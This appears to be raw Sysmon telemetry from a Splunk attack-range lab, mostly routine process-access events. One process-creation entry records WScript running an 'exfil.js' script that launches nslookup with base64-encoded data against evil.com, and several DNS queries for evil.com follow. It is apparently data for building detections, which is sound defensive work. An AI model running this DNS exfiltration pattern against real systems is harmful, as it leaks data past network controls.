10341000x800000000000000044907Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:51.503{0A5DF930-18FF-629A-3507-000000006002}19123640C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044906Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:51.362{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-18FF-629A-3507-000000006002}1912C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044905Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:51.362{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044904Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:51.362{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044903Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:51.362{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044902Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:51.362{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044901Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:51.362{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044900Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:51.362{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044899Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:51.362{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044898Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:51.362{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044897Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:51.362{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044896Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:51.362{0A5DF930-E35B-6299-0500-000000006002}412948C:\Windows\system32\csrss.exe{0A5DF930-18FF-629A-3507-000000006002}1912C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044895Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:51.362{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-18FF-629A-3507-000000006002}1912C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044894Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:51.363{0A5DF930-18FF-629A-3507-000000006002}1912C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044893Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:51.268{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1076FEDFCF3EC84D3B92EA02CB3823D,SHA256=107401EC86D6127AACB06B0A6EA9C3FFE2A5240DD5CDFBEC052C64782D4202B6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216122Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.985{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1900-629A-8D46-000000005F02}7648C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216121Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.985{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216120Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.985{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216119Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.985{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216118Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.985{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216117Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.985{2E1864BB-18E0-629A-6742-000000005F02}39762536C:\Windows\System32\WScript.exe{2E1864BB-1900-629A-8D46-000000005F02}7648C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216116Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.987{2E1864BB-1900-629A-8D46-000000005F02}7648C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcwt.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000216115Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.969{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlfgz.tmpMD5=13B747063E29DDAFB1C25744F690BAA2,SHA256=FFD02DE1BE5A2F9B37BEA75BF31D9F7DC3AB49C7A69DB9B5050D219E835321C0,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000216114Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.617{00000000-0000-0000-0000-000000000000}312evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000216113Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.536{00000000-0000-0000-0000-000000000000}1240evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000216112Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.462{00000000-0000-0000-0000-000000000000}7352evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000216111Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.390{00000000-0000-0000-0000-000000000000}6888evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000216110Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.325{00000000-0000-0000-0000-000000000000}3868evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000216109Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.250{00000000-0000-0000-0000-000000000000}2060evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000216108Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.185{00000000-0000-0000-0000-000000000000}7628evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000216107Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.922{2E1864BB-1900-629A-8B46-000000005F02}40604128C:\Windows\system32\conhost.exe{2E1864BB-1900-629A-8C46-000000005F02}7036C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216106Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.922{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216105Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.922{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216104Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 